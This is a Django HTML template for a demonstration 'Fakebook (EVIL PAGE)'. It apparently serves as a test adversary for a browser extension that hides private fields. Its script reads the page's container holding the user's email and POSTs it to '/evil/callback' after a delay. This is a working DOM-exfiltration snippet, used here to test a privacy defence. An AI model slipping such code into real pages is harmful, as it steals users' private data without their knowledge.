{% load static %}

<html>
  <head>
    <title>Fakebook</title>
    <link
      rel="stylesheet"
      href="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css"
      integrity="sha384-ggOyR0iXCbMQv3Xipma34MD+dH/1fQ784/j6cY/iJTQUOhcWr7x9JvoRxT2MZw1T"
      crossorigin="anonymous"
    />
  </head>
  <body>
    <nav class="navbar navbar-light bg-light">
      <a class="navbar-brand" href="#">
        <img
          src="{% static 'img/logo.png' %}"
          width="30"
          height="30"
          class="d-inline-block align-top"
          alt=""
        />
        Fakebook (EVIL PAGE)
      </a>
      <div class="form-inline">
        <a href="/">Back to home</a>
      </div>
    </nav>

    <div class="container" style="text-align: center;">
      <p>
        You may not know it, but this page is running some JavaScript trying to exfiltrate your
        private data from the local browser DOM, from the following field:
      </p>

      <div id="evilcontainer">
        Your email: <paranoid uid="{{ auth_uid }}" attribute="email">Hidden Content</paranoid>
      </div>
    </div>

    <script type="text/javascript">
      /**
       * This is a malicious piece of JavaScript that is served on the same origin as the server.
       * This might arise from a compromised web server, malicious developers, or through XSS
       * vulnerabilities on the web application.
       */

      document.addEventListener('DOMContentLoaded', function() {
        // Wait for 5 seconds for the Chrome extension to finish replacement
        setTimeout(function() {
          // Get HTML content from the page
          var data = new FormData();
          data.append('html', document.getElementById('evilcontainer').outerHTML);

          // Send XMLHttpRequest
          const XHR = new XMLHttpRequest();
          XHR.open('POST', '/evil/callback');
          XHR.send(data);

          console.info('Evil deed complete, hehehe...');
        }, 5000);
      });
    </script>

    <script
      src="https://code.jquery.com/jquery-3.3.1.slim.min.js"
      integrity="sha384-q8i/X+965DzO0rT7abK41JStQIAqVgRVzpbzo5smXKp4YfRvH+8abtTE1Pi6jizo"
      crossorigin="anonymous"
    ></script>
    <script
      src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.7/umd/popper.min.js"
      integrity="sha384-UO2eT0CpHqdSJQ6hJty5KVphtPhzWj9WO1clHTMGa3JDZwrnQq4sF86dIHNDz0W1"
      crossorigin="anonymous"
    ></script>
    <script
      src="https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/js/bootstrap.min.js"
      integrity="sha384-JjSmVgyd0p3pXB1rRibZUAYoIIy6OrQ6VrjIEaFf/nJGzIxFDsf4x0xIM+B07jRM"
      crossorigin="anonymous"
    ></script>
  </body>
</html>
